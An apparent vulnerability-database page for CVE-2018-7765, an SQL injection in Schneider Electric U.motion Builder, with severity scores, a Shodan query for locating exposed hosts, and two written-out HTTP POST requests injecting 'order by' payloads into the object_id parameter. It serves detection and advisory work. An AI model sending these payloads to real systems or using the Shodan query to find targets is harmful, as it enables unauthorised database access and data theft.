🔙 목록으로 돌아가기

CVE-2018-7765: Schneider Electric U.motion Builder - SQL Injection

TitleSchneider Electric U.motion Builder - SQL Injection
Authordaffainfo
SeverityHigh
ImpactAttackers can execute arbitrary SQL commands, potentially leading to data theft, modification, or deletion.
RemediationUpdate to version v1.3.4 or later.
CVSS Score8.8
EPSS Score0.1749
CVE IDCVE-2018-7765
CWE IDCWE-89
Shodan Queryhttp.headers_hash:1985490094
Tags cve cve2018 schneider-electric sqli vkev

🔍 Vulnerability Description

The vulnerability exists within processing of track_import_export.php in Schneider Electric U.motion Builder software versions prior to v1.3.4. The underlying SQLite database query is subject to SQL injection on the object_id input parameter.

🌐 HTTP Request

POST /umotion/modules/reporting/track_import_export.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5.1 Safari/605.1.15
Connection: close
Content-Length: 65
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

op=export&language=english&interval=1&object_id=1' order by 1-- -
POST /umotion/modules/reporting/track_import_export.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.6.7
Connection: close
Content-Length: 65
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

op=export&language=english&interval=1&object_id=1' order by 2-- -

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-7765.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-7765.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A